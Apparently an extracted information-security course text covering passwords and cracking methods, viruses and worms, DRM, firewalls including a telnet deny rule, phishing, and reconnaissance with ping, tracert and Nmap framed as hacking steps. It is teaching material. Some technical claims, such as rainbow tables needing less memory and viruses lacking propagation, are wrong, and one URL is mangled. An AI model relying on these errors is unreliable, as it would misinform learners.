2.10.2 Keys Versus Password
Key (cryptography)
In cryptography, a key is a piece of information (a parameter) that
determines the functional output of a cryptographic algorithm or
cipher. Without a key, the algorithm would produce no useful result. In
encryption, a key specifies the particular transformation of plaintext
into cipher text, or vice versa during decryption. Keys are also used in
other cryptographic algorithms, such as digital signature schemes and
message authentication codes.
Passwords are used to encrypt or hide files. If you have many
passwords, you can store all of them in a list, open with one "master
password". That master password is called Access Key (to a list of
passwords).Activation Keys are useful only to those that want to
develop their own encryption algorithms or new carriers. It's an
internal security system of east-tec Invisible Secrets.
2.10.3 Attacking Systems via Passwords
Everyone is probably familiar with passwords. Passwords are
the most common access control method used by system administers to
manage the usage of network resources and applications. Usernames
are entered along with a password when a user wants to login to a
secure system. The widespread use of passwords to access sensitive
information makes them a favorite target of attackers. Password
attacks, also called password cracking, are the techniques that are used
to discover passwords.
Passwords should not be saved in unencrypted formats or written
on paper. This means that many times frequently-used passwords
must be committed to memory. The problem arises because in order to
be secure, a password should be significantly long and complex so that
it cannot be easily guessed, which makes it hard to remember.
The simplest password attack is a brute force attack where an

attacker tries random sequences of characters. Trying a couple
32
passwords a second, an automated brute force attack on an eight letter
password that uses the characters from a standard QWERTY keyboard
would take millions of years to figure out. Since brute force attacks are
difficult, many times attackers will try to steal a database of hashed
passwords and break them offline using a dictionary attack.
A dictionary attack compiles a massive list of common words and

their variations and computes their cryptographic hash values. These
hash values are then compared against a database of hashed passwords
to determine the original unencrypted password. A more modern
method of cracking hashed databases of passwords is by using rainbow
tables.
A rainbow table uses a huge list of precomputed hash values of

almost all possible password combinations. Rainbow tables are faster
than dictionary and brute force attacks and requires less memory. A 14
character password that would require millions of years to crack using
brute force can be broken in under an hour using rainbow tables.
2.10.4 Password Verification
There are several fundamental differences between traditional

passwords, such as those user need to sign in to their Google Account
verification codes and application-specific passwords that users use as
part of 2-Step verification.
The verification methods are 3 types.
Ÿ Traditional password
Ÿ Verification codes
Ÿ Application specific passwords
33
a. Traditional password
Fig 2.5 Password Authentication

Ÿ Created when you first sign up for a Google Account or change your
password
Ÿ Generally a combination of letters, digits and characters that you
choose
Ÿ You need to remember it
Ÿ If you forget your traditional password, you can always reset it using
your recovery options, such as your backup email address or phone
number
b. Verification codes
A text message with your code has been sent to:
*** *** **20

Enter Code:
Don’t ask for codes again to this
Fig 2.6 Code Verification
34
Ÿ Delivered to your phone or generated by the Google Authenticator
App.
Ÿ Six to eight digits (Example: 012345)
Ÿ You don't have to remember it, because you can get a new
verification code each time you need one.
Ÿ You'll need it every time you sign in unless you've marked a
computer as "trusted"
Ÿ Generate backup codes ahead of time and print them out, so you can
use them as a backup if you don't have access to your phone
Ÿ If you own an Android device, you can also generate codes through
Google settings, even if your device is offline.
c. Application specific passwords
Fig 2.7 Password Specification

Ÿ You generate it on the Authorizing applications & sites page
Ÿ Sixteen letters (Example: hog ugly kid zebu)
Ÿ You don't have to remember it, because you can generate a new one
anytime
Ÿ You'll need it when you want to authorize a device, a mobile
application (such as a Gmail app on your mobile phone), or a
35
desktop application (such as Ad Words Editor) to connect to your
Google account
Ÿ If you lose a phone or stop using an application that was authorized
with an application-specific password, revoke the application-
specific password for that application.
d. Digital Signatures
Digital signatures are used to detect unauthorized modifications
to data and to authenticate the identity of the signatory. Digital
signatures are commonly used for software distribution, financial
transactions, and in other cases where it is important to detect forgery or
tampering.
Functional Standards for Authentication of Electronic Records
Digital Signatures
Authentication: the process of assuring that an electronic signature is
that of the person purporting to sign a record or otherwise conducting
an electronic transaction.
Digital Certificate: An attachment to an electronic message used for
security purposes, which enables a user sending a message via an
unsecured network.
Electronic: relating to technology having electrical, digital, magnetic,
wireless, optical, electromagnetic, or similar capabilities.
36
2.11 QUESTIONS
Give Short Answers
1. What are the steps involved to transform the original text to the
cipher text?
2. What is Cryptography?
3. Name the essential ingredients of a symmetric cipher.
4. What is meant by Cryptanalysis?
5. List any four encryption algorithm with its key management
issues.
6. What is the purpose of Elliptic curve Cryptography?
7. List any two drawbacks of RSA algorithm.
8. Define Authentication.
9. Define Biometric.
10. Name the methods used to verify the password.
11. What is password cracking?
1. Compare and contrast Des and Triple Des algorithm.
2. How Barcode and Magnetic stripe card protect the information?
3. What is the purpose of Smart Card and SIM Card?
4. Illustrate the password based Cryptography.
5. Distinguish between key and password.
6. Elucidate the password attack.
7. What are the steps involved to verify the password?
8. How will you authenticate the data using Biometric techniques?
37
UNIT III
Firewalls, Viruses & Worms
&
Digital Rights Management
3.1 VIRUSES AND WORMS
Virus, what is it?
Ÿ A Hacker's Cough
Ÿ A wasted trip to the Doctor
Ÿ Ebola
Ÿ A computer program that is designed to replicate itself by copying

itself into the other programs stored in a computer. It may be benign
or have a negative effect, such as causing a program to operate
incorrectly or corrupting a computer's memory
3.1.1 Viruses
Ÿ A virus is a small piece of software that piggybacks on real programs.
Ÿ 2 main characteristics of viruses
s It must execute itself.

s It must replicate itself.
Ÿ Virus might attach itself to a program such as spreadsheet. Each time
the spreadsheet program runs, the virus runs too and replicates it.
3.1.2 Types of Viruses
s File infector virus
s Infect program files
Ÿ Boot sector virus
s Infect the system area of a disk
Ÿ Master boot record virus
s Infect disks in the same manner as boot sector viruses. The

difference between these two virus types is where the viral code is
located.
Ÿ Multi-partite virus
41
s Infect both boot records and program files
Ÿ Macro virus
s Infect data files. Examples: Microsoft Office Word, Excel,

PowerPoint and Access files
Ÿ E-mail Viruses
s Moves around in e-mail messages

s Usually replicate by automatically mailing itself to dozens of
people in the victim's email address book.
Example "MELISSA VIRUS”
3.2 WORMS
Ÿ Small piece of software that uses computer networks and security
holes to replicate itself
Ÿ Copy of the worm scans the network for another machine that has a
specific security hole
Ÿ Copy itself to the new machine using the security hole and start
replicating
Ÿ Example "CODE RED”
Ÿ The early bird's breakfast
Ÿ A malicious program that replicates itself until it fills all of the

storage space on a drive or network.
3.2.1 The Problem with Worms and Virus Attacks
Ÿ Annoyance to users
Ÿ Costly to businesses (lost productivity)
Ÿ Security threat to government (compromised data)

3.2.2 Notable Attacks
Ÿ Nimda, Code Red, Slammer
Ÿ MSBlast
42
s Infected over 350,000 hosts in Aug. 16, 2003
Ÿ SoBigF
s Infected 1 million users in first 24 hours

s Infected > 200 million in the first week
s Caused an estimated $1 billion in damages to repair.
3.2.3 Detectable by a Signature in Content
Ÿ Pattern of bytes
Ÿ Regular expression
Ÿ Morphable pattern
3.2.4 Challenges in Stopping Worm and Virus Attacks

Ÿ End-systems difficult to maintain
s Operating systems become outdated

s Users introduce new machines on network
Ÿ Internet contains several types of traffic
s Web, file transfers, telnet

s Data may appear anywhere in the packet
Ÿ Networks process High Speed Data
s Multi Gigabit/second data transmission rates now commonplace

in campus, corporate, and backbone networks
s Peer-to-Peer protocols dominate current and future traffic
s Need Real-time gathering
Ÿ No latency can be tolerated.
3.2.5 Difference between Viruses and Worms

Ÿ The difference between a worm and a virus is that a virus does not
have a propagation vector. i.e., it will only affect one host and does
not propagate to other hosts. Worms propagate and infect other
43
computers. Majority of threats are actually worms that propagate to
other hosts
Ÿ A Virus is a malicious program that spreads using a propagation
technique that generally requires user intervention, and always
possess a malicious intent
Ÿ A worm on the other hand, has ability to self-propagate and may or
may not have malicious intent.
3.2.6 Salient Differences
Ÿ Computer Virus: Needs a host file, copies itself, executable
Ÿ Network Worm: No host (self-contained), copies itself, executable
3.2.7 Typical Symptoms

Ÿ File deletion
Ÿ File corruption
Ÿ Visual effects
Ÿ Pop-Ups
Ÿ Erratic (and unwanted) behavior
Ÿ Computer crashes
3.3 DIGITAL RIGHTS MANAGEMENT

Digital Rights Management (DRM) refers to protecting
ownership / copyright of electronic content by restricting what
actions an authorized recipient may take in regard to that content.
DRM digital-content publishers the ability to securely distribute
high-value content such as periodicals, books, photographs,
educational material, video, and research and to control the use of that
content, preventing unauthorized distribution.
Digital or electronic content, such as e-books, photographs on
Web sites and electronic databases are subject to the same protections
under the Copyright Act as non-digital, traditional or analog works. In
44
addition, there are specific provisions relating to digital content in the
1998 amendment to the Copyright Act by the Digital Millennium
Copyright Act (DMCA).
The Digital Millennium Copyright Act (DMCA) is an amendment
to United States copyright law, passed unanimously on May 14, 1998,
which criminalizes the production and dissemination of technology
that allows users to circumvent technical copy-restriction methods.
Under the Act, circumvention of a technological measure that
effectively controls access to a work is illegal if done with the primary
intent of violating the rights of copyright holders.
"Small" Rights Management includes
Ÿ Protecting personal information
Ÿ Protecting personal health and financial information
Ÿ Protecting individual communication
Ÿ Protecting corporate information
"Big" Rights Management includes

Ÿ Mass Market Content
Ÿ Books
Ÿ Audio
Ÿ Video
Ÿ Software
DRM is defined as a broad range of technologies that grant control

and protection to content providers over their own digital media. From
the content's point of view, there are three key components to its life
cycle: the creation of content, the distribution and upkeep of content,
and the use of content. A good DRM scheme should account for all three
components, and effectively define the interactions between the user,
the permissions and the content itself. The figure3.1 demonstrates this
in more detail.
45
Rights
Validation
Content
Creation
Rights
and
Workflow
Capture
Rights
Creation Content
Repository Meta Data
DRM Content
Management
Payment
Trading
Permission Distribution
Management
Content
Use
Tracking
Fig 3.1 DRM-Process

3.4 FIREWALLS
Ÿ A firewall is an integrated collection of security measures designed
to prevent unauthorized electronic access to a networked computer
system.
46
Ÿ A network firewall is similar to firewalls in building construction,
because in both cases they are intended to isolate one "network" or
"compartment" from another.
Fig 3.2 Network Firewall

3.4.1 What is Firewalls?
Ÿ Firewall is a collection of components placed between two networks
that collectively have the following properties:
Ÿ All traffic from inside to outside, and vice versa, must pass through
the firewall
Ÿ Only authorised traffic, as defined by the local security policy, will be
allowed to pass
Ÿ The firewall itself is immune to penetration.
47
LAN
WAN
Firewall
Fig 3.3 An illustration of where a firewall would be located in a network.

3.4.2 What do Firewalls Protect?
Ÿ Data
s Proprietary corporate information
s Financial information
s Sensitive employee or customer data
Ÿ Resources
s Computing resources
s Time resources
Ÿ Reputation
s Loss of confidence in an organization
s Intruder uses an organization's network to attack other sites.

3.4.3 Firewalls Guard Against
Ÿ Internal users
Ÿ Hackers
48
Ÿ Corporate espionage
Ÿ Terrorists
Ÿ Common thieves
3.4.4 Firewall Types: There are different types of firewalls depending

on where the communication is taking place, where the communication
is intercepted and the state that is being traced.
3.4.5 Packet Filters: Packet filtering firewalls were the first generation of
firewalls. Packet filters track the source and destination address of IP
packets permitting packets to pass through the firewall based on rules
that the network manager has set as shown in the figure 3.4.
Two advantages of packet filter firewalls are that they are fairly
easy to implement and they're transparent to the end users. However,
packet filters can be easy to implement, they can prove difficult to
configure properly, particularly if a large number of rules have to be
generated to handle a wide variety of application traffic and users.
3.5 APPLICATION AND CIRCUIT PROXIES
These firewalls enable users to utilize a proxy to communicate

with secure systems, hiding valuable data and servers from potential
attackers. The proxy accepts a connection from the other side and if the
connection is permitted, makes a second connection to the destination
host on the other side. The client attempting the connection is never
directly connected to the destination. Because proxies can act on
different types of traffic or packets from different applications, a proxy
firewall (or proxy server, as it is often called) is usually designed to use
proxy agents, in which an agent is programmed to handle one specific
type of transfer, say FTP traffic or TCP traffic.
49
Example Filters:
Do Protocol Source Destination
Deny TCP All Inside Port 23
Permit TCP 128 .18.30.2 Inside Port 23
Firewall
128 .18.30.2
Filters
Filter
Internet
Engine
Server
(Port 23)
Rejected Application
Presentation
Other
client Session
Transport
Network
Data link
Physical
Fig 3.4 Packet Filtering

The more types of traffic that you want to pass through the proxy,
the more proxy agents need to be loaded and running on the machine.
Circuit proxies focus on the TCP/IP layers, using the network IP
connection as a proxy (see Figure). Circuit proxies are more secure than
packet filters because computers on the external network never gain
50
information about internal network IP addresses or ports. A circuit
proxy is typically installed between your network router and the
Internet, communicating with the Internet on behalf of your network.
Real network addresses can be hidden because only the address of the
proxy is transmitted on the Internet.
When a circuit proxy establishes a circuit between a user and the
destination, the proxy doesn't inspect the traffic going through the
circuit, which can make the proxy more efficient than an application
proxy, but may compromise security.
On the other hand, circuit proxies are slower than packet filters
because they must reconstruct the IP header to each packet to its correct
destination. Also, circuit proxies are not transparent to the end user,
because they require modified client software.
Fig 3.5 Circuit Proxy
Proxy server
Connection
FTP server
state
IP proxy
Client agent
Internet
Application
Presentation
Session
Transport
Network
Data link
Physical
51
Application proxies examine the actual application data being
transmitted in an IP packet (see Figure). This approach thwarts any
attackers who spoof IP packets to gain unauthorized access to the
protected network. Because application proxies function at the
application layer of the OSI model, they can also be used to validate
other security keys, inducing user passwords and service requests.
Proxy server
FTP server
FTP proxy
agent
Internet
Client Application
Presentation
Session
Transport
Network
Data link
Physical
Fig 3.6 Application Proxy

Proxy firewalls often require two copies of an agent running for
each service: one copy to communicate with the internal hosts and one
to communicate with the external hosts. Thus, an application proxy
may have two copies each of FTP, HTTP, and telnet agents. A circuit
proxy operates in a similar fashion; it may have one copy of TCP for the
internal network and one copy for the external network.
52
3.6 STATEFUL INSPECTION
The optimal firewall is one that provides the best security with the
fastest performance. A technique called Stateful Multi-Layer Inspection
(SMLI) was invented to make security tighter while making it easier and
less expensive to use, without slowing down performance. SMLI is the
foundation of a new generation of firewall products that can be applied
across different kinds of protocol boundaries, with an abundance of
easy-to-use features and advanced functions.
SMLI is similar to an application proxy in the sense that all levels

of the OSI model are examined. Instead of using a proxy, which reads
and processes each packet through some data manipulation logic, SMLI
use traffic-screening algorithms optimized for high-throughput data
parsing.
One of the advantages to SMLI is that the firewall closes all TCP
ports and then dynamically open ports when connections require them.
This feature allows management of services that use port numbers
greater than 1,023, such as PPTP, which can require added
configuration changes in other types of firewalls. Stateful inspection
firewalls also provide features such as TCP sequence-number
randomization and UDP filtering.
53
Fig 3.7 Stateful Inspection
Stateful inspection firewall
State tables
State
inspection
engine
Internet
Server
Client Application
Presentation
Session
Transport
Network
Data link
Physical
3.7 DESIGN PRINCIPLES OF FIREWALL

Ÿ Information systems undergo a steady evolution (from small LAN`s
to Internet connectivity)
Ÿ Strong security features for all workstations The firewall is inserted
between the premises network and the Internet
Aims:
Ÿ Establish a controlled link
Ÿ Protect the premises network from Internet-based attacks
Ÿ Provide a single choke point
3.7.1 Design goals:

Ÿ All traffic from inside to outside must pass through the firewall
(physically blocking all access to the local network except via the
firewall)
54
Ÿ Only authorized traffic (defined by the local security police) will be
allowed to pass
Ÿ The firewall itself is immune to penetration (use of trusted system
with a secure operating system).
55
3.8 QUESTIONS
Give Short answers
1. What are the characteristics of virus?
2. Give some examples that infect the data file using macro virus.
3. How can the data be protected using firewall?
4. What makes the computer program to operate incorrectly?
5. How does worm propagate?
6. List the different types of viruses.
7. List any three design goal for a firewall.
8. What is an application - level gateway?
9. What is a circuit level gateway?
10. List any four techniques used by firewall to control access and
enforce a security policy.
11. Name any four weaknesses of a packet filter firewall.
12. Why is it useful to have host-based firewalls?
13. What information is used by a packet filtering firewall?
Answer briefly in one paragraph
1. Compare and contrast a packet filtering firewall and a stateful
inspection firewall.
2. Compare and contrast the different types of viruses.
3. Distinguish between virus and worms.
4. How will you protect the data from worm and virus attacks?
5. Compare and contrast packet filter and circuit filter
56
UNIT IV
Hacking
4.1 HACKING - INTRODUCTION
Hacking is the practice of modifying the features of a system, in
order to accomplish a goal outside of the creator's original purpose. The
person who is consistently engaging in hacking activities, and has
accepted hacking as a lifestyle and philosophy of their choice, is called a
hacker.
4.1.1 Hacker Motivations
Ÿ Attack the evil empire (Microsoft)
Ÿ Display of dominance
Ÿ Showing off, revenge
Ÿ Misdirected creativity
Ÿ Embezzlement, greed
"Who knows what evil lurks in the hearts of men?"

4.1.2 Popular Fallacies
Ÿ If I never log off then my computer can never get a virus
Ÿ If I lock my office door then my computer can never get a virus
Ÿ Companies create viruses so they can sell anti-virus software
Ÿ Microsoft will protect me
And a few more….

Ÿ I got this disc from my (mother, boss, friend) so it must be okay
Ÿ You cannot get a virus by opening an attachment from someone

you know
Ÿ But I only downloaded one file
Ÿ I am too smart to fall for a scam
Ÿ You can catch a cold from a computer virus.
59
4.2 HACKER HIERARCHY
If knowledge is power, and the Internet is the superhighway of
information, then hackers are the BAMFest surfer-pirates in the whole
World Wide Web. Some are more powerful than others however, and
any hacker will tell you there is a pecking order to hackerdom. Here is a
list of hacker hierarchy:
a. Script Kiddies - A derogatory nickname in the hacker-world,
these wannabe hackers don't actually write any code. They search
through hacker forums and download hacks written by other much
more terrifying hackers and they often (mis)use the prewritten code for
personal gain.
These posers often get caught, not knowing the ins and outs of
how a hack is designed or how to keep off the radar of White Hat
Hackers. However, sometimes even Script Kiddies can stumble into
some serious naughtiness. A prime example being world famously
accused Script Kiddy Vladimir Levin who is rumored to have bought a
hack from a group of Black Hat Hackers based in St. Petersburg for $100.
He attempted to steal $10.7 million from Citibank's computers before
getting himself caught.
b. Black Hat Hackers - commonly known simply as "hackers," these
outlaws go toe-to-toe against White Hat Hackers in order to break into
systems and attempt to steal information. Forever scouring the cracks in
code for the path of least resistance to secured data, when Black Hat
Hackers gain access they use their hacker powers for evil maliciousness.
Unfortunately no Black Hat Hackers have stepped forward to reveal
their identities for this post, however their handles are well known.
"Sabu" most likely the most notorious hacker still at-large today, was
mastermind and co-founder of Lulz Security (LulzSec for short) a
famous hacker organization whose non-profit motivation was to have
fun by causing mayhem "just for the lulz of it." LulzSec made headlines
when they stalled the Play station gaming network for weeks and stole
reportedly millions of users' information including usernames,
60
passwords, email addresses, and home addresses from Sony's
databases.
Attacks by LulzSec also include hacking: PBS, shutting down the
CIA website, breaking into the US Senate's website, the UK's Serious
Organized Crime Agency, Infragard's database (FBI affiliate), Arizona's
Department of Public Safety, Black & Berg Cyber security consulting,
and releasing hundreds of thousands of user names and passwords
from various sources to the public via Twitter. Perhaps the most
terrifying promise from Lulzsec is codename "Antisec" a combined
effort of LulzSec and Hacktivist group Anonymous, which openly
protests government censorship and monitoring of the internet.
Antisec has been labeled a declaration of cyber war against
governments and corporations. LulzSec has since disbanded due to
recent alleged arrests of core members "Topiary" and “T-flow." Rumors
abound of how the members were discovered, and interestingly, none
of the rumors include the authorities tracking them down. In a recent
interview via Twitter, Sabu said, "the ironic twist will be that my own
friends will take me down, and not these idiots who hide behind the
patriot veil."
c. White Hat Hackers - Often getting their start dabbling in Black
Hat Hacking, these talented hackers switch to the good side for various
reasons (including jail time and plea bargains.) No matter how they got
there, these are the defenders of systems, sort of like Tron, "I fight for the
users." White Hat Hackers are security experts hired by corporations to
build defenses against the hackers of the world from gaining access to
private data.
Using an ever-evolving arsenal of technology and original code to
secure sensitive information, White Hat Hackers are the sheriffs of the
cyber-frontier. Some notable White Hat Hackers include Kevin Mitnick
who currently works as a consultant and writer about hacking and
security, but started as a devious Black Hat Hacker in his teenage years
when he broke into the North American Air Defense computer after
61
which he quickly earned priority #1 as America's Most Wanted
Computer Criminal Mitnick eventually hacked the famous White Hat
Hacker Tsutomu Shimomura just to prove that he could. The joke was
on Mitnick, however, because Shimomura, in retaliation, used his
hacking expertise to help the FBI finally track down and catch Mitnick
and eventually flipped him to the good side.
d. Cyber Terrorists - Cyber-Terrorism is loosely defined as acts of
deliberate, large-scale disruption of computer networks in furtherance
of political or social objectives, and at the moment is a very real threat
that could result in massive infrastructure damage and even death.
Today more than ever our society keeps more information stored online
and depends on computers to run the infrastructure that helps run our
daily lives. In the wake of Y2K (NOT a cyber-terrorist attack, just a
minor programming issue with potentially devastating results) and
9/11 (terrorist yes, cyber-terrorist no) governments across the world
have realized the vulnerability that our society has to the threat of
cyber-terrorism.
Governments have been predicting scenarios and bulking up
security against Cyber-Terrorist attacks, while blockbuster movies have
used these scenarios to depict the enormously dangerous potential that
a cyber-terrorist attack holds (ex. Live Free or Die Hard.) Thankfully, at
the time of this post, a massive scale cyber-terrorist attack has yet to
make major headlines, but some of the scenarios include: rerouting
railways carrying passengers and freights of dangerous chemicals,
factories and nuclear power plants melting down and spilling toxins
into the atmosphere, dams controlling water levels surrounding
heavily populated areas, the hijacking of air traffic controls, power grids
controlling electricity to cities, also oil and gas utilities with explosive
potential for devastation. All of these infrastructures are controlled by
computer systems to name just a few.
4.3 PASSWORD CRACKING - Definition
The process of attempting to guess or crack passwords to gain access to
62
a computer system or network. Crackers will generally use a variety of
tools, scripts, or software to crack a system password. The goal of the
cracker is to ideally obtain the password for root (UNIX) or system and
administrator (Windows, NT). Password cracks work by comparing
every encrypted dictionary word against the entries in system
password file until a match is found.
4.3.1 Time needed for password searches
The time to crack a password is related to bit strength
(seepassword strength); which is a measure of the password's
information entropy. Most methods of password cracking require the
computer to produce many candidate passwords, each of which is
checked. One example is brute-force cracking, in which a computer tries
every possible key or password until it succeeds. More common
methods of password cracking such as dictionary attacks, pattern
checking, word list substitution, etc., attempt to reduce the number of
trials required and will usually be attempted before brute force. Higher
password bit strength increases exponentially the number of candidate
passwords that must be checked, on average, to recover the password
and reduces the likelihood that the password will be found in any
cracking dictionary.
The ability to crack passwords using computer programs is also a
function of the number of possible passwords per second which can be
checked. If a hash of the target password is available to the attacker, this
number can be quite large. If not, the rate depends on whether the
authentication software limits how often a password can be tried, either
by time delays, CAPTCHAs, or forced lockouts after some number of
failed attempts. Another situation where quick guessing is possible is
when the password is used to form a cryptographic key. In such cases,
an attacker can quickly check to see if a guessed password successfully
decodes encrypted data. For example, one commercial product claims
to test 103,000 WPA PSK passwords per second.
63
4.3.2 Prevention
The best method of preventing a password from being cracked is
to ensure that attackers cannot get access even to the hashed password.
For example, on the UNIX operating system, hashed passwords were
originally stored in a publicly accessible file. On modern Unix (and
similar) systems, on the other hand, they are stored in the file
/etc/shadow, which is accessible only to programs running with
enhanced privileges (i.e., "system" privileges). This makes it harder for a
malicious user to obtain the hashed passwords in the first instance.
Unfortunately, many common Network Protocols transmit passwords
in clear text or use weak challenge/response schemes.
4.4 PHISHING
Phishing is the act of attempting to acquire sensitive information
such as usernames, passwords, and credit card details (and sometimes,
indirectly, money) by masquerading as a trustworthy entity in an
electronic communication. Communications purporting to be from
popular social web sites, auction sites, banks, online payment
processors or IT administrators are commonly used to lure
unsuspecting public.
Phishing emails may contain links to websites that are infected
with malware. Phishing is typically carried out by spoofing or instant
messaging and it often directs users to enter details at a fake website
whose look and feel are almost identical to the legitimate one. Phishing
is an example of social engineering techniques used to deceive users,
and exploits the poor usability of current web security technologies.
Attempts to deal with the growing number of reported phishing
incidents include legislation, user training, public awareness, and
technical security measures.
A phishing technique was described in detail in 1987, and
(according to its creator) the first recorded use of the term "phishing"
was made in 1995 by Jason Shannon of AST Computers. The term is a
variant of fishing, probably influenced by phreaking, and alludes to
64
"baits" used in hopes that the potential victim will "bite" by clicking a
malicious link or opening a malicious attachment, in which case their
financial information and passwords may then be stolen.
4.4.1 List of Phishing Techniques
Phishing is a way of attempting to acquire information such as
usernames, passwords, and credit card details by masquerading as a
trustworthy entity in an electronic communication.
a. Spear Phishing
Phishing attempts directed at specific individuals or companies
have been termed spear phishing. Attackers may gather personal
information about their target to increase their probability of success.
b. Clone Phishing
A type of phishing attack whereby a legitimate, and previously
delivered, email containing an attachment or link has had its content
and recipient address (es) taken and used to create an almost identical
or cloned email. The attachment or Link within the email is replaced
with a malicious version and then sent from an email address spoofed to
appear to come from the original sender. It may claim to be a resend of
the original or an updated version to the original. This technique could
be used to pivot (indirectly) from a previously infected machine and
gain a foothold on another machine, by exploiting the social trust
associated with the inferred connection due to both parties receiving the
original email.
c. Whaling
Several recent phishing attacks have been directed specifically at
senior executives and other high profile targets within businesses, and
the term whaling has been coined for these kind of attacks.
4.5 NETWORK HACKING
4.5.1 Ping
The IP address gives the attacker's Internet address. The numerical
65
address like 212.214.172.81 does not reveal much. You can use PING to
convert the address into a domain name in WINDOWS. The Domain
Name Service (DNS) protocol reveals the matching domain name.
PING stands for "Packet Internet Groper" and is delivered with
practically every Internet compatible system, including all current
Windows versions. Make sure you are logged on to the net. Open the
DOS shell and enter the following PING command: Ping -a 123.123.12.1.
Ping will search the domain name and reveal it. You will often have
information on the provider the attacker uses
e.g.: dialup21982.gateway123.provider.com
Pinging is normally the first step involved in hacking the target.
Ping uses ICMP (Internet Control Messaging Protocol) to determine
whether the target host is reachable or not. Ping sends out ICMP Echo
packets to the target host, if the target host is alive it would respond back
with ICMP Echo reply packets. All the versions of Windows also
contain the ping tool. To ping a remote host follows the procedure
below. Click Start and then click Run. Now type ping <ip address or
hostname>
(For example: ping yahoo.com)
Fig 4.1 Ping Window
66
This means that the attacker logged on using "provider.com".
Unfortunately; there are several IP addresses that cannot be converted
into domain names. For more parameter that could be used with the
ping command, go to DOS prompt and type ping /? Command.
4.5.2 Ping Sweep
If you are undetermined about your target and just want a live
system, ping sweep is the solution for you. Ping sweep also uses ICMP
to scan for live systems in the specified range of IP addresses. Though
ping sweep is similar to ping but reduces the time involved in pinging a
range of IP addresses. Nmap (http://www.insecure.org) also contains
an option to perform ping sweeps.
4.5.3 Tracert:
Tracert is another interesting tool available to find more
interesting information about a remote host. Tracert also uses ICMP.
Tracert helps you to find out some information about the systems
involved in sending data (packets) from source to destination. To
perform a tracert follow the procedure below.
Fig 4.2 Tracert Window
67
Tracert connects to the computer whose IP has been entered and reveals
all stations starting from your Internet connection. Both the IP address
as well as the domain name (if available) is displayed.
If ping cannot reveal a name, Tracert route will possibly deliver the
name of the last or second last station to the attacker, which may enable
conclusions concerning the name of the provider used by the attacker
and the region from which the attacks are coming. Go to DOS prompt
and type tracert <destination address> (For example: tracert
yahoo.com).But there are some tools available like Visual Tracert which
help you even to find the geographical location of the routers involved.
Http://www.visualware.com/visualroute.
4.5.4 Port Scanning:-
After you have determined that your target system is alive the
next important step would be to perform a port scan on the target
system.
There are a wide range of port scanners available for free. But
many of them use outdated techniques for port scanning which could
be easily recognized by the network administrator. For example, Nmap
(http://www.insecure.org) which has a wide range of options. You can
download the NmapWin and its source code from:
Fig 4.3 NmapWin Source Code
68
Apart from port scanning Nmap is capable of identifying the Operating
system being used, version numbers of various services running,
firewalls being used and a lot more.
4.6 WIRELESS HACKING
Wireless networks broadcast their packets using radio frequency
or optical wavelengths. A modern laptop computer can listen in.
Worse, an attacker can manufacture new packets on the fly and
persuade wireless stations to accept his packets as legitimate.
4.6.1 Wireless LAN Overview
IEEE 802.11 refers to a family of specifications
(www.ieee802.org/11/) developed by the IEEE for over-the-air
interface between a wireless client and an AP or between two wireless
clients. To be called 802.11 devices, they must conform to the Medium
Access Control (MAC) and Physical Layer specifications. The IEEE
802.11 standard covers the Physical (Layer 1) and Data Link (Layer 2)
layers of the OSI Model. The main concern is the MAC layer and not the
variations of the physical layer known as 802.11a/b/g.
4.6.2 Stations and Access Points
A wireless network interface card (adapter) is a device, called a
station, providing the network physical layer over a radio link to
another station. An access point (AP) is a station that provides frame
distribution service to stations associated with it. The AP itself is
typically connected by wire to a LAN.
The station and AP each contain a network interface that has a
Media Access Control (MAC) address, just as wired network cards do.
This address is a world-wide-unique 48-bit number, assigned to it at the
time of manufacture. The 48-bit address is often represented as a string of
six octets separated by colons (e.g., 00:02:2D:17:B9:E8) or hyphens (e.g., 00-
02-2D-17-B9-E8). While the MAC address as assigned by the manufacturer
is printed on the device, the address can be changed in software.
69
Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also
commonly called a network name. The SSID is used to segment the
airwaves for usage. If two wireless networks are physically close, the
SSIDs label the respective networks, and allow the components of one
network to ignore those of the other. SSIDs can also be mapped to
virtual LANs; thus, some APs support multiple SSIDs. Unlike fully
qualified host names (e.g., gamma.cs.wright.edu), SSIDs are not
registered, and it is possible that two unrelated networks use the same
SSID.
4.6.3 Frames
Both the station and AP radiate and gather 802.11 frames as
needed. The format of frames is illustrated below. Most of the frames
contain IP packets. The other frames are for the management and
control of the wireless connection.
Fig 4.4 Frame Format

There are three classes of frames. The management frames establish
and maintain communications. These are of Association request,
Association response, Reassociation request, Reassociation response,
Probe request, Probe response, Beacon, Announcement traffic
indication message, Disassociation, Authentication, Deauthentication
types. The SSID is part of several of the management frames.
Management messages are always sent in the clear, even when link
encryption (WEP or WPA) is used, so the SSID is visible to anyone who
can intercept these frames.
The control frames help in the delivery of data.
70
The data frames encapsulate the OSI Network Layer packets.
These contain the source and destination MAC address, the BSSID, and
the TCP/IP datagram. The payload part of the datagram is WEP-
encrypted.
4.6.4 Authentication
Authentication is the process of proving identity of a station to
another station or AP. In the open system authentication, all stations
are authenticated without any checking. In Fig 4.5 station A sends an
Authentication management frame that contains the identity of A, to
station B. Station B replies with a frame that indicates recognition,
addressed to A. In the closed network architecture, the stations must
know the SSID of the AP in order to connect to the AP. The shared key
authentication uses a standard challenge and response along with a
shared secret key.
Fig 4.5Authentication Process
71
4.6.5 Wireless Network Sniffing
Sniffing is eavesdropping on the network. A (packet) sniffer is a
program that intercepts and decodes network traffic broadcast through
a medium. Sniffing is the act by a machine S of making copies of a
network packet sent by machine A intended to be received by machine
B. Such sniffing, strictly speaking, is not a TCP/IP problem, but it is
enabled by the choice of broadcast media, Ethernet and 802.11, as the
physical and data link layers.
Sniffing has long been a reconnaissance technique used in wired
networks. Attackers sniff the frames necessary to enable the exploits
described in later sections. Sniffing is the underlying technique used in
tools that monitor the health of a network. Sniffing can also help find
the easy kill as in scanning for open access points that allow anyone to
connect, or capturing the passwords used in a connection session that
does not even use WEP, or in telnet, rlogin and ftp connections.
It is easier to sniff wireless networks than wired ones. It is easy to
sniff the wireless traffic of a building by setting shop in a car parked in a
lot as far away as a mile, or while driving around the block. In a wired
network, the attacker must find a way to install a sniffer on one or more
of the hosts in the targeted subnet. Depending on the equipment used
in a LAN, a sniffer needs to be run either on the victim machine whose
traffic is of interest or on some other host in the same subnet as the
victim. An attacker at large on the Internet has other techniques that
make it possible to install a sniffer remotely on the victim machine.
4.6.6 Passive Scanning
Scanning is the act of sniffing by tuning to various radio channels
of the devices. A passive network scanner instructs the wireless card to
listen to each channel for a few messages. This does not reveal the
presence of the scanner.
